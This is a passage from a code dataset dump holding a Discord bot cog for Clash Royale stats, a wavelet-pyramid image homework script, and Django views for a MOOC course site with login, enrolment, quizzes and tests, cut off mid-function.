return\n\n embed = discord.Embed(description=clandata.description, color=0xFAA61A)\n embed.set_author(name=clandata.name + \" (#\"+clandata.tag+\")\",\n icon_url=clandata.badge.image,\n url=\"https://legendclans.com/clanInfo/\"+clandata.tag)\n embed.set_thumbnail(url=clandata.badge.image)\n embed.add_field(name=\"Members\", value=\"{} {}/50\".format(self.emoji(\"members\"), clandata.member_count), inline=True)\n embed.add_field(name=\"Leader\", value=await self.getClanLeader(clandata.members), inline=True)\n embed.add_field(name=\"Donations\", value=\"{} {:,}\".format(self.emoji(\"cards\"), clandata.donations), inline=True)\n embed.add_field(name=\"Score\", value=\"{} {:,}\".format(self.emoji(\"PB\"), clandata.score), inline=True)\n\n warTrophies = await self.getClanWarTrophies(clandata.tag)\n if warTrophies is not None:\n embed.add_field(name=\"War Trophies\",\n value=\"{} {:,}\".format(self.getLeagueEmoji(warTrophies), warTrophies), inline=True)\n\n embed.add_field(name=\"Required Trophies\",\n value=\"{} {:,}\".format(self.emoji(\"crtrophy\"), clandata.required_score), inline=True)\n embed.add_field(name=\"Status\", value=\":envelope_with_arrow: {}\".format(clandata.type.title()), inline=True)\n if clandata.location.is_country:\n embed.add_field(name=\"Country\",\n value=\":flag_{}: {}\".format(clandata.location.code.lower(), clandata.location.name), inline=True)\n else:\n embed.add_field(name=\"Location\", value=\":earth_americas: {}\".format(clandata.location.name), inline=True)\n embed.set_footer(text=credits, icon_url=creditIcon)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True, aliases=['cw'])\n async def tournament(self, ctx, tag, password=None):\n \"\"\"View Clash Royale Tournament Information \"\"\"\n\n await self.bot.type()\n\n tag = await self.tags.formatTag(tag)\n\n if not await self.tags.verifyTag(tag):\n await self.bot.say(\"The ID you provided has invalid characters. Please try again.\")\n return\n\n await self.bot.delete_message(ctx.message)\n\n try:\n tourneydata = await self.clash.get_tournament(tag)\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: Tournament not found. Please double check your #TAG\")\n return\n\n maxPlayers = tourneydata.max_players\n cards = self.getCards(maxPlayers)\n coins = self.getCoins(maxPlayers)\n\n embed = discord.Embed(title=\"Click this link to join the Tournament in Clash Royale!\",\n url=\"https://legendclans.com/tournaments?id={}&pass={}\".format(tag, password), color=0xFAA61A)\n embed.set_thumbnail(url='https://statsroyale.com/images/tournament.png')\n\n embed.set_author(name=\"{} (#{})\".format(tourneydata.name, tourneydata.tag),\n url=\"https://royaleapi.com/tournament/\" + tourneydata.tag)\n\n embed.add_field(name=\"Players\", value=\"{} {}/{}\".format(self.emoji(\"members\"),\n tourneydata.current_players,\n maxPlayers), inline=True)\n embed.add_field(name=\"Status\", value=tourneydata.status.title(), inline=True)\n\n if not tourneydata.open:\n if password is not None:\n embed.add_field(name=\"Password\", value=\"```{}```\".format(password), inline=True)\n else:\n await self.bot.say(\"Error: Please enter a tournament password.\")\n return\n\n if tourneydata.status != \"ended\":\n\n if tourneydata.status != \"inProgress\":\n startTime = self.sec2tme((tourneydata.create_time + tourneydata.prep_time) - int(time.time()))\n embed.add_field(name=\"Starts In\", value=startTime, inline=True)\n\n endTime = self.sec2tme((tourneydata.create_time + tourneydata.prep_time + tourneydata.duration) - int(time.time()))\n embed.add_field(name=\"Ends In\", value=endTime, inline=True)\n\n embed.add_field(name=\"Hosted By\", value=tourneydata.creator.name, inline=True)\n embed.add_field(name=\"Top prize\", value=\"{} {} {} {}\".format(self.emoji(\"tournamentcards\"),\n cards,\n self.emoji(\"coin\"),\n coins), inline=True)\n embed.set_footer(text=credits, icon_url=creditIcon)\n\n await self.bot.say(embed=embed)\n\n @commands.command(pass_context=True)\n async def save(self, ctx, profiletag: str, member: discord.Member=None):\n \"\"\" save your Clash Royale Profile Tag\n\n Example:\n [p]save #CRRYTPTT @GR8\n [p]save #CRRYRPCC\n \"\"\"\n\n server = ctx.message.server\n author = ctx.message.author\n\n profiletag = await self.tags.formatTag(profiletag)\n\n if not await self.tags.verifyTag(profiletag):\n await self.bot.say(\"The ID you provided has invalid characters. Please try again.\")\n return\n\n await self.bot.type()\n\n allowed = False\n if member is None:\n allowed = True\n elif member.id == author.id:\n allowed = True\n else:\n botcommander_roles = [discord.utils.get(server.roles, name=r) for r in BOTCOMMANDER_ROLES]\n botcommander_roles = set(botcommander_roles)\n author_roles = set(author.roles)\n if len(author_roles.intersection(botcommander_roles)):\n allowed = True\n\n if not allowed:\n await self.bot.say(\"You dont have enough permissions to set tags for others.\")\n return\n\n member = member or ctx.message.author\n\n try:\n profiledata = await self.clash.get_player(profiletag)\n\n checkUser = await self.tags.getUser(server.members, profiletag)\n if checkUser is not None:\n await self.bot.say(\"Error, This Player ID is already linked with **\" + checkUser.display_name + \"**\")\n return\n\n await self.tags.linkTag(profiletag, member.id)\n\n embed = discord.Embed(color=discord.Color.green())\n avatar = member.avatar_url if member.avatar else member.default_avatar_url\n embed.set_author(name='{} (#{}) has been successfully saved.'.format(profiledata.name, profiletag),\n icon_url=avatar)\n await self.bot.say(embed=embed)\n except clashroyaleAPI.NotFoundError:\n await self.bot.say(\"We cannot find your ID in our database, please try again.\")\n return\n except clashroyaleAPI.RequestError:\n await self.bot.say(\"Error: cannot reach Clash Royale Servers. Please try again later.\")\n return\n\n\ndef setup(bot):\n bot.add_cog(clashroyale(bot))\n","sub_path":"clashroyale/clashroyale.py","file_name":"clashroyale.py","file_ext":"py","file_size_in_byte":17581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"347269384","text":"## Default modules imported. Import more if you need to.\n\nimport numpy as np\nfrom skimage.io import imread, imsave\nfrom scipy.signal import convolve2d as conv2\n\n## Fill out these functions yourself\n\ndef im2wv(img,nLev):\n # Placeholder that does nothing\n length = img.shape[0] # suppose input image is a square\n kernel = np.array([[1,-1,-1,1],\n [1,1,-1,-1],\n [1,-1,1,-1],\n [1,1,1,1]])\n kernel = 1/2 * kernel\n V = []\n\n if nLev < np.sqrt(length):\n for lev in range(nLev):\n length = img.shape[0]\n region = int(length/2)\n L = np.zeros((region,region), dtype=np.float32)\n H1 = np.zeros((region,region), dtype=np.float32)\n H2 = np.zeros((region,region), dtype=np.float32)\n H3 = np.zeros((region,region), dtype=np.float32)\n V_output = []\n\n for i in range(0, length, 2):\n for j in range(0, length, 2):\n\n region = img[i:i+2, j:j+2].reshape(1,4)\n map = np.dot(region, kernel)\n newi = int(i/2)\n newj = int(j/2)\n L[newi,newj] = map[0,0]\n H2[newi,newj] = map[0,1]\n H1[newi,newj] = map[0,2]\n H3[newi,newj] = map[0,3]\n\n V_output.append(H1)\n V_output.append(H2)\n V_output.append(H3)\n img = L\n print(L.shape)\n\n V.append(V_output)\n V.append(img)\n\n return V\n\n\ndef wv2im(pyr):\n # Placeholder that does nothing\n level = len(pyr)-1\n origsize = (pyr[0][0].shape[0])*2\n image = pyr[level] # update it later\n orikernel = np.array([[1, -1, -1, 1],\n [1, 1, -1, -1],\n [1, -1, 1, -1],\n [1, 1, 1, 1]])\n orikernel = 1 / 2 * orikernel\n kernel = np.linalg.inv(orikernel)\n\n for le in range(level):\n H1, H2, H3 = pyr[level-1-le]\n print(H1.shape)\n Lscalar = image.reshape(1, image.size)\n H1Scalar = H1.reshape(1, H1.size)\n H2Scalar = H2.reshape(1, H2.size)\n H3Scalar = H3.reshape(1, H3.size)\n All = np.zeros((4, image.size), dtype=np.float32)\n All[0,:] = Lscalar\n All[1,:] = H2Scalar\n All[2,:] = H1Scalar\n All[3,:] = H3Scalar\n\n length = image.shape[0]\n newimage = np.zeros((length*2, length*2), dtype=np.float32)\n j = 0\n for i in range(All.shape[1]):\n dd = All[:, i].reshape(1, 4)\n origin = np.dot(dd, kernel)\n newimage[2*(i // length), 2 * (i % length)] = origin[0, 0]\n newimage[2*(i // length), 2 * (i % length) + 1] = origin[0, 1]\n newimage[2*(i // length) + 1, 2 * (i % length)] = origin[0, 2]\n newimage[2*(i // length) + 1, 2 * (i % length) + 1] = origin[0, 3]\n image = newimage\n print(image.shape)\n\n return newimage\n\n\n########################## Support code below\n\nfrom os.path import normpath as fn # Fixes window/linux path conventions\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# Utility functions to clip intensities b/w 0 and 1\n# Otherwise imsave complains\ndef clip(im):\n return np.maximum(0.,np.minimum(1.,im))\n\n\n#Visualize pyramid like in slides\ndef vis(pyr, lev=0):\n if len(pyr) == 1:\n return pyr[0]/(2**lev)\n\n sz=pyr[0][0].shape\n sz1 = [sz[0]*2,sz[1]*2]\n img = np.zeros(sz1,dtype=np.float32)\n\n img[0:sz[0],0:sz[1]] = vis(pyr[1:],lev+1)\n\n # Just scale / shift gradient images for visualization\n img[sz[0]:, 0:sz[1]] = pyr[0][0]*(2**(1-lev))+0.5\n img[0:sz[0],sz[1]:] = pyr[0][1]*(2**(1-lev))+0.5\n img[sz[0]:, sz[1]:] = pyr[0][2]*(2**(1-lev))+0.5\n\n return img\n\n\n\n############# Main Program\n\n\nimg = np.float32(imread(fn('inputs/p6_inp.jpg')))/255. # img.shape = [256, 256]\n\n# Visualize pyramids\npyr = im2wv(img,1)\noutput = clip(vis(pyr))\nimsave(fn('outputs/prob6a_1.jpg'),clip(vis(pyr)))\n\npyr = im2wv(img,2)\nimsave(fn('outputs/prob6a_2.jpg'),clip(vis(pyr)))\n\npyr = im2wv(img,3)\nimsave(fn('outputs/prob6a_3.jpg'),clip(vis(pyr)))\n\n# Inverse transform to reconstruct image\noriginal = wv2im(pyr)\nim = clip(original)\nimsave(fn('outputs/prob6b.jpg'),im)\n\n# Zero out some levels and reconstruct\nfor i in range(len(pyr)-1):\n\n for j in range(3):\n pyr[i][j][...] = 0.\n\n im = clip(wv2im(pyr))\n imsave(fn('outputs/prob6b_%d.jpg' % i),im)\n","sub_path":"pset1/code/prob6.py","file_name":"prob6.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"88503694","text":"# -*- coding:utf-8 -*-\nfrom django.template import RequestContext\nfrom django.http import FileResponse\nfrom django.shortcuts import render_to_response, HttpResponseRedirect, Http404\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom Mooc.models import *\nfrom Mooc.forms import *\nimport urllib2\nimport StringIO\nimport random\nimport datetime\nfrom os import environ\n#from sae.ext.storage import monkey\nfrom django.http import JsonResponse\nfrom django.template import Context,loader\nfrom django.http import HttpResponse\nimport os\n# Create your views here.\nSTUDY_TIME_INF = 2999\n\n\ndef ren2res(template, request, dic={}):\n if request.user.is_authenticated():\n dic.update({'user': {'id': request.user.id, 'name': request.user.get_username()}})\n userinfo = request.user.info\n dic.update({'userinfo': userinfo})\n else:\n dic.update({'user': False})\n if request:\n return render_to_response(template, dic, context_instance=RequestContext(request))\n else:\n return render_to_response(template, dic)\n\n\ndef home(request):\n courses = list(Course.objects.all().order_by('id')[0:6])\n if Course.objects.all().count() > len(courses):\n Flag = True\n else:\n Flag = False\n courseclass = 'all'\n number=2\n courses_num=[]\n for i in range(0,len(courses)):\n if((i+1)%3 == 1):\n courses_num.append([courses[i],0])\n print(courses[i].img)\n elif ((i+1)%3 == 2):\n courses_num.append([courses[i],-1])\n print(courses[i].img)\n else:\n courses_num.append([courses[i],1])\n print(courses[i].img)\n #推荐课程\n str = ['first','second','third']\n course_like = list(Course.objects.all().order_by('-likeCounter')[0:3])\n courses_like = []\n for i in range(0,3):\n courses_like.append([course_like[i],str[i]])\n return ren2res('index.html', request, {'courses_num': courses_num,'courseclass':courseclass,'number':number,'Flag':Flag,'courses_like':courses_like,})\n\n\ndef login(request):\n print('login')\n # 第一次请求到get方法,返回页面\n if request.method == 'GET':\n # 匿名用户说明未登陆\n if request.user.is_anonymous():\n # 后继访问请求\n request.session['login_from'] = request.META.get('HTTP_REFERER', '/')\n loginform = LoginForm()\n return ren2res('./user/login.html', request, {'loginform': loginform})\n else:\n # 已登录用户,登陆无效\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n # post方法,包含了name pw\n elif request.method == 'POST':\n # 验证身份\n loginform = LoginForm(request.POST)\n # 用于判断登录的表单的数据是否合法\n if loginform.is_valid():\n username = loginform.cleaned_data['username']\n password = loginform.cleaned_data['password']\n user = auth.authenticate(username=username, password=password)\n\n print(request.META.get('HTTP_REFERER'))\n str_list = request.META.get('HTTP_REFERER').split('/')\n str_http = ''\n k=0\n for i in range(0,len(str_list)):\n if str_list[i] == '?next=':\n k=1\n elif k:\n str_http += '/'+str_list[i]\n if user is not None:\n auth.login(request, user)\n return HttpResponseRedirect(str_http)\n else:\n # 按说不会到这一步,如果到了就是写错了\n #这一步应该是用户名,密码不匹配才执行吧\n return ren2res('./user/login.html', request, {'loginform': loginform})\n else:\n return ren2res('./user/login.html', request, {'loginform': loginform})\n\n\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect('/')\n\n\ndef register(request):\n if request.method == 'GET':\n registerform = RegisterForm()\n return ren2res('./user/register.html', request, {'registerform': registerform})\n elif request.method == 'POST':\n print(request.POST)\n registerform = RegisterForm(request.POST)\n if registerform.is_valid():\n username = registerform.cleaned_data['username']\n password1 = registerform.cleaned_data['password1']\n password2 = registerform.cleaned_data['password2']\n nickname = registerform.cleaned_data['nickname']\n # 先不保存下列信息,改到个人主页再填写\n # school = registerform.cleaned_data['school']\n # birthday = registerform.cleaned_data['birthday']\n # sex = registerform.cleaned_data['sex']\n # userform = {'username': username, 'password1': password1, 'pass2': password2,\n # 'nickname': nickname, 'school': school, 'birthday': birthday, 'sex': sex}\n # 用于存储用户信息\n newuser = User()\n newuser.username = username\n newuser.set_password(password1)\n newuser.save()\n newuserinfo = UserInfo(user=newuser, nickname=nickname)\n newuserinfo.save()\n user = auth.authenticate(username=username, password=password1)\n auth.login(request, user)\n return HttpResponseRedirect('/')\n else:\n print('error')\n registerform.password1 = ''\n registerform.password2 = ''\n try:\n username_error = str(registerform.errors['username'])[26:-10]\n except:\n username_error=None;\n\n try:\n password1_error = str(registerform.errors['password1'])[26:-10]\n except:\n password1_error=None;\n\n try:\n password2_error = str(registerform.errors['password2'])[26:-10]\n except:\n password2_error=None;\n registerform.errors.clear()\n return ren2res('./user/register.html', request, {'registerform': registerform,'username_error':username_error,\n 'password1_error':password1_error,'password2_error':password2_error})\n\n@login_required\ndef change_pass(request):\n old = str(request.POST.get('old'))\n new1 = str(request.POST.get('new1'))\n new2 = str(request.POST.get('new2'))\n #print(old+new1+new2)\n username = request.user.username\n #print('username='+str(username))\n user = auth.authenticate(username=username, password=old)\n #print(request.user)\n if user is None:\n print('error1')\n message = u'原密码错误'\n return JsonResponse({'message':message})\n elif new1 != new2:\n message = u'两次密码不一致'\n return JsonResponse({'message':message})\n else:\n user.set_password(new1)\n user.save()\n message = u'保存成功'\n auth.login(request, user)\n return JsonResponse({'message':message})\n\n@login_required\ndef change_info(request):\n sex = request.POST.get('sex')\n birthday = request.POST.get('birthday')\n school = request.POST.get('school')\n userinfo = request.user.info\n if sex is not None:\n userinfo.sex = sex\n if birthday != '':\n userinfo.birthday = birthday\n if school is not None:\n userinfo.school = school\n try:\n content = request.FILES[\"file1\"]\n online = environ.get(\"APP_NAME\", \"\")\n if len(content) != 0 and online:\n import sae.const\n access_key = sae.const.ACCESS_KEY\n secret_key = sae.const.SECRET_KEY\n appname = sae.const.APP_NAME\n domain_name = \"mooc\"\n import sae.storage\n s = sae.storage.Client()\n ob = sae.storage.Object(content.read())\n dir = 'img/user/'+str(request.user.id)\n url = s.put(domain_name, dir, ob)\n userinfo.img = url\n except Exception:\n print(1)\n userinfo.save()\n return JsonResponse({'message': u'个人信息修改成功!', 'user_img': userinfo.img})\n\n@login_required\ndef course_summary(request, cid):\n #try:\n if True:\n servertime = datetime.date.today()\n course = Course.objects.get(id=cid)\n units = course.units.all().order_by('counter')\n unit_sum = len(units)\n begintime = course.cur_time.begin_time # .replace(tzinfo=None)\n time_list = course.times.all().order_by('begin_time')\n # total_hour是一门课总共需要的小时数\n total_days = 0\n for unit in units:\n total_days += unit.gap_days\n # delta_hour是距今为止这门课经历的小时数\n delta_days = int((servertime - begintime).days)\n if ((delta_days >= 0) and (delta_days > total_days)) or int(course.cur_time.begin_time.year) == STUDY_TIME_INF:\n old_time = course.cur_time\n old_time.cur_course = None\n old_time.save()\n for t in time_list:\n delta = int((servertime - t.begin_time).days)\n if delta <= total_days:\n t.cur_course = course\n t.save()\n break\n if int(course.cur_time.begin_time.year) == STUDY_TIME_INF:\n # 排除bug,当没有一个time可以作为选课时间的时候\n click = False\n message = u'暂无课程安排'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'course': course, 'units': units, 'message': message, 'unit_sum': unit_sum})\n # except Exception:\n # raise Http404\n if course is not None:\n result = StudyStatus.objects.filter(course=course, user=request.user)\n course_begintime = course.cur_time.begin_time\n times = []\n # 加上当前的开课日期\n times.append(course.cur_time)\n for time in time_list:\n begin_time = time.begin_time\n if int((servertime-begin_time).days) <= int((course.units.all()[0]).gap_days) and int(begin_time.year) != STUDY_TIME_INF:\n times.append(time)\n if len(result) == 0:\n if len(times) != 0:\n click = True\n message = u'报名选课'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'time_list': time_list, 'course': course, 'units': units,\n 'message': message, 'times': times, 'unit_sum': unit_sum})\n else:\n click = False\n message = u'暂无选课安排'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'time_list': time_list, 'course': course, 'units': units,\n 'message': message, 'times': times, 'unit_sum': unit_sum})\n else:\n # 选了这门课了\n studystatus = result[0]\n if studystatus.course_time.begin_time < course_begintime:\n # 询问用户是否重新选课\n if len(times) == 0:\n click = False\n message = u'暂无选课安排'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'time_list': time_list, 'course': course, 'units': units,\n 'message': message, 'times': times, 'unit_sum': unit_sum})\n else:\n click = True\n message = u'重新选课'\n warning_mess = u'重新选课后,关于这门课的所有学习记录都将被清除,请谨慎选择!'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'time_list': time_list, 'course': course, 'units': units,\n 'message': message, 'times': times, 'warning_mess': warning_mess,\n 'unit_sum': unit_sum})\n else:\n # 目前正在学习\n if course_begintime > servertime or course_begintime < studystatus.course_time.begin_time:\n # 还未开课\n click = False\n message = u'等待开课'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'course': course, 'units': units, 'message': message,\n 'studystatus': studystatus, 'unit_sum': unit_sum})\n else:\n # 可以学习\n click = True\n message = u'开始学习'\n return ren2res('./course/course_index.html', request,\n {'click': click, 'course': course, 'units': units, 'message': message,\n 'studystatus': studystatus, 'unit_sum': unit_sum})\n else:\n raise Http404\n\n\n@login_required\ndef study(request):\n course_id = request.GET.get('cid')\n if course_id is None:\n print('wtf?!')\n return HttpResponseRedirect('/')\n course_id = int(course_id)\n course = Course.objects.get(id=course_id)\n # 排除Url漏洞\n result = StudyStatus.objects.filter(course=course, user=request.user)\n if len(result) == 0:\n print('error0')\n return HttpResponseRedirect('/')\n # 获取服务器时间,课程开始时间\n servertime = datetime.date.today()\n course_begin_time = course.cur_time.begin_time\n # 判断课程是否开始\n if servertime < course_begin_time:\n # 课程未开始\n return HttpResponseRedirect('/course/' + str(course_id))\n else:\n print('coursestart')\n # 课程已开始执行else\n #获取将要学习的unit\n units = course.units.order_by('counter')\n delta_days = int((servertime - course_begin_time).days)\n gap_days = 0\n cnt = -1\n for unit in units:\n cnt += 1\n gap_days += unit.gap_days\n if gap_days >= delta_days:\n obj_unit = units[cnt]\n break\n print(obj_unit.counter)\n unit_cnt = request.GET.get('unit_cnt')\n if unit_cnt is None:\n # 直接给出当前unit的第一个section\n sections = obj_unit.sections.all().order_by('counter')\n section = sections[0]\n video = str(section.video)\n pdf = str(section.pdf)[5:]\n # 返回前更新一下section的访问信息\n section_cnt = 1\n unit_cnt = obj_unit.counter\n #------------------获取用户笔记--------------------------\n try:\n usernote = UserNote.objects.get(user_id=request.user.id,course=course,unit_counter=unit_cnt)\n except Exception:\n usernote=None\n #--------------------------------------------------------\n studystatus = StudyStatus.objects.get(course=course, user=request.user)\n result = studystatus.quizstore.filter(unit_counter=unit_cnt, section_counter=section_cnt)\n if len(result) == 0:\n quizstore = QuizStore(unit_counter=unit_cnt, section_counter=section_cnt, studystatus=studystatus)\n else:\n quizstore = result[0]\n quizstore.visit = True\n quizstore.save()\n # 更新last_section\n studystatus.last_section = max(int(studystatus.last_section), int(section.total_counter))\n studystatus.save()\n return ren2res('./course/study.html', request, {'section': section, 'video': video, 'pdf': pdf,\n 'course': course, 'units': units, 'obj_unit': obj_unit,\n 'usernote':usernote,'course_id':course_id,'unit_cnt':unit_cnt,})\n unit_cnt = int(unit_cnt)\n section_cnt = request.GET.get('section_cnt')\n if section_cnt is None:\n return HttpResponseRedirect('/course/' + str(course_id))\n section_cnt = int(section_cnt)\n\n # 得到目标section\n try:\n section = course.units.all().get(counter=unit_cnt).sections.all().get(counter=section_cnt)\n except Exception:\n print('erroeqqq')\n raise Http404\n if section.unit.counter > obj_unit.counter:\n tmp_section = obj_unit.sections.all().order_by('-counter')[0]\n return HttpResponseRedirect(\n '/study/?cid=' + str(course_id) + '&unit_cnt=' + str(obj_unit.counter) + '§ion_cnt=' + str(\n tmp_section.counter))\n\n #------------------获取用户笔记--------------------------\n try:\n usernote = UserNote.objects.get(user_id=request.user.id,course=course,unit_counter=unit_cnt)\n except Exception:\n usernote=None\n #--------------------------------------------------------\n # 正常返回\n video = str(section.video)\n pdf = str(section.pdf)[5:]\n # 返回前更新一下section的访问信息\n studystatus = StudyStatus.objects.get(course=course, user=request.user)\n result = studystatus.quizstore.filter(unit_counter=unit_cnt, section_counter=section_cnt)\n if len(result) == 0:\n quizstore = QuizStore()\n quizstore.unit_counter = unit_cnt\n quizstore.section_counter = section_cnt\n quizstore.studystatus = studystatus\n else:\n quizstore = result[0]\n quizstore.visit = True\n quizstore.save()\n # 更新last_section\n studystatus.last_section = max(int(studystatus.last_section), int(section.total_counter))\n studystatus.save()\n return ren2res('./course/study.html', request, {'section': section, 'video': video, 'pdf': pdf,\n 'course': course, 'units': units, 'obj_unit': obj_unit,\n 'usernote':usernote,'course_id':course_id,'unit_cnt':unit_cnt})\n\n\ndef study_index(request, cid):\n course = Course.objects.get(id=cid)\n units = course.units.all().order_by('counter')\n user = request.user\n studystatus = StudyStatus.objects.get(course=course, user=user)\n if studystatus.course_time.begin_time == course.cur_time.begin_time:\n finished = False\n else:\n finished = True\n unit = []\n for i in range(1, len(units) + 1):\n # print(len(studystatus.teststore.filter(unit_counter=i)))\n unit.append([course.units.get(counter=i), studystatus.teststore.filter(unit_counter=i)])\n last_section_cnt = int(studystatus.last_section)\n # 未开始学习\n if last_section_cnt == 0:\n last_section_cnt = 1\n next_section_cnt = 1\n last_section = course.sections.all().get(total_counter=last_section_cnt)\n next_section = course.sections.all().get(total_counter=next_section_cnt)\n return ren2res('./course/study_index.html', request,\n {'course': course, 'units': unit, 'studystatus': studystatus, 'last_section': last_section,\n 'next_section': next_section, 'finished': finished})\n last_section = course.sections.all().get(total_counter=last_section_cnt)\n next_section_cnt = last_section_cnt + 1\n if next_section_cnt > len(course.sections.all()):\n next_section_cnt = len(course.sections.all())\n next_section = course.sections.all().get(total_counter=next_section_cnt)\n return ren2res('./course/study_index.html', request,\n {'course': course, 'units': unit, 'studystatus': studystatus, 'last_section': last_section,\n 'next_section': next_section, 'finished': finished})\n\n\n@login_required\ndef take_course(request):\n try:\n course_id = request.GET.get('cid')\n course = Course.objects.get(id=course_id)\n time_id = request.GET.get('tid')\n time = CourseTime.objects.get(id=time_id)\n user = request.user\n result = StudyStatus.objects.filter(course=course, user=user)\n if len(result) >= 1:\n # 此处询问用户是否删除记录重新选课\n result[0].delete()\n print('chongxinxuanke')\n # 此处不重定向,直接继续进行下方的Studystatus的新建过程。\n # return HttpResponseRedirect('/course/' + str(course_id), request)\n except:\n raise Http404\n if len(StudyStatus.objects.filter(course=course, user=user)) == 0:\n studystatus = StudyStatus()\n studystatus.course = course\n studystatus.user = user\n studystatus.course_time = time\n studystatus.save()\n else:\n raise Http404\n return HttpResponseRedirect('/course/' + str(course_id), request)\n\n\n@login_required\ndef take_quiz(request, course_id, unit_cnt, section_cnt):\n try:\n course = Course.objects.get(id=course_id)\n user = request.user\n quiz = course.units.all().get(counter=unit_cnt).sections.all().get(counter=section_cnt).quiz\n result = StudyStatus.objects.filter(course=course, user=user)\n if len(result) == 0:\n return HttpResponseRedirect('/')\n studystatus = result[0]\n except Exception:\n print('error1')\n raise Http404\n question = quiz.questions.all()\n questions = []\n for item in question:\n questions.append(item)\n if request.method == 'GET':\n try:\n quizstore = studystatus.quizstore.all().filter(unit_counter=unit_cnt, section_counter=section_cnt)\n if len(quizstore) == 1:\n # 用户之前做过这个quiz,要提取出答案传回html\n quizstore = quizstore[0]\n Answer = list(quizstore.Answer)\n for num in range(0, len(Answer)):\n questions[num].user_answer = Answer[num]\n # ......\n else:\n # 不存在quizstore\n # 为用户创建quizstore\n quizstore = QuizStore(studystatus=studystatus, unit_counter=unit_cnt, section_counter=section_cnt)\n quizstore.save()\n Answer = []\n # 按照之前的写就可以了\n # ....\n return ren2res('./course/quiz.html', request,\n {'Question': question, 'Answer': Answer, 'course_id': course_id, 'unit_cnt': unit_cnt,\n 'section_cnt': section_cnt})\n except Exception:\n print('error2')\n raise Http404\n elif request.method == 'POST':\n try:\n # 得到用户上传的并进行处理,记得把原来的删除,新修改的save\n if ''.join(request.POST.get('DoQuiz').split()) == 'Redo':\n Answer = []\n else:\n studystatus = result[0]\n quizstores = studystatus.quizstore.all().filter(unit_counter=unit_cnt, section_counter=section_cnt)\n quizstore = quizstores[0]\n judge = question.filter(question_type='0') # 获取quiz中的判断题\n option = question.filter(question_type='1') # 获quiz中的取选择题\n Answer = []\n # 以下两个for循环用于获取用户答案\n #将选择题答案存入Answer\n for num in range(0, len(option)):\n if request.POST.get('option' + str(num)) == None:\n Answer.append(' ')\n questions[num].user_answer = ''\n else:\n Answer.append(request.POST.get('option' + str(num)))\n questions[num].user_answer = Answer[num]\n #将判断题答案存入Answer\n print(Answer)\n offset = len(option)\n for num in range(0, len(judge)):\n if request.POST.get('judge' + str(num + offset)) == None:\n Answer.append(' ')\n questions[num + offset].user_answer = ''\n else:\n Answer.append(request.POST.get('judge' + str(num + offset)))\n questions[num + offset].user_answer = Answer[num + offset]\n quizstore.Answer = ''.join(Answer)\n quizstore.save()\n return ren2res('./course/quiz.html', request,\n {'Question': questions, 'Answer': Answer, 'course_id': course_id, 'unit_cnt': unit_cnt,\n 'section_cnt': section_cnt})\n except Exception:\n raise Http404\n else:\n return HttpResponseRedirect('/')\n\n@csrf_exempt\n@login_required\ndef take_test(request, course_id, unit_cnt, test_counter):\n # 当test_counter=0时,自动分配合适的test_counter\n print('test' + str(test_counter))\n if True:\n # try:\n course = Course.objects.get(id=course_id)\n user = request.user\n unit = course.units.get(counter=unit_cnt)\n unit_test = unit.test\n # -----------------------------------------------2\n max_submit_times = unit_test.max_submit_times\n last_time = unit_test.last_time\n # -----------------------------------------------2\n result = StudyStatus.objects.filter(user=user, course=course)\n studystatus = result[0]\n # except Exception:\n # raise Http404\n question = unit_test.test_content.questions.all()\n questions = []\n testscore = 0\n answer = []\n if int(test_counter) == 0:\n result = studystatus.teststore.all()\n test_counter = len(result) + 1\n print('test' + str(test_counter))\n # -----------------------------------------------3\n if int(test_counter) > int(max_submit_times):\n return HttpResponseRedirect('/')\n #-----------------------------------------------3\n if request.method == 'GET':\n try:\n teststore = studystatus.teststore.filter(unit_counter=unit_cnt, test_counter=test_counter)\n if len(teststore) == 1: #用户做过该test,查看该test\n teststore = teststore[0]\n questions_id = (teststore.question_id).split(',')[:len(teststore.question_id) / 2]\n print(questions_id)\n for i in questions_id:\n if i != '': #根据题目数目不同,question_id最后一个值可能为'',需要除去\n questions.append(question.get(counter=int(i)))\n questions.sort(key=lambda x: x.question_type)\n answer = list(teststore.Answer)\n for j in range(0, len(answer)):\n questions[j].user_answer = answer[j]\n testscore = teststore.score\n else: #teststore不存在,用户第一次做test\n #用于保存题目的编号\n print('not exist')\n questions_id = ''\n while ( len(questions) < ( len(question) * 2 / 3 ) ): #随机抽取数量2/3的题目\n a = random.randint(1, len(question))\n if question.get(counter=a) in questions:\n continue\n else:\n questions.append(question.get(counter=a))\n questions_id += (str(a) + ',')\n #建立一个teststore存储题目\n teststore = TestStore(unit_counter=unit_cnt, test_counter=test_counter, studystatus=studystatus,\n question_id=questions_id, score=0, submit_time=datetime.date.today())\n teststore.save()\n #调整题目顺序,判断在前,选择在后\n questions.sort(key=lambda x: x.question_type)\n return ren2res('./course/test.html', request,\n {'Questions': questions, 'Answer': answer, 'TestScore': testscore, 'course_id': course_id,\n 'unit_cnt': unit_cnt, 'test_counter': test_counter})\n except Exception:\n raise Http404\n elif request.method == 'POST':\n #用户提交答案\n try:\n #必定有teststore存在\n teststore = studystatus.teststore.get(unit_counter=unit_cnt, test_counter=test_counter)\n questions_id = (teststore.question_id).split(',')[:len(teststore.question_id) / 2]\n for i in questions_id:\n if i != '':\n questions.append(question.get(counter=int(i)))\n questions.sort(key=lambda x: x.question_type)\n judge = []\n option = []\n #获取不同类型题目的数量\n for item in questions:\n if item.question_type == '0':\n judge.append(item)\n elif item.question_type == '1':\n option.append(item)\n #以下两个for循环用于获取用户答案\n #将选择题答案存入Answer\n for num in range(0, len(judge)):\n if request.POST.get('judge' + str(num)) == None:\n answer.append(' ')\n questions[num].user_answer = ''\n else:\n answer.append(request.POST.get('judge' + str(num)))\n questions[num].user_answer = answer[num]\n #将判断题答案存入Answer\n 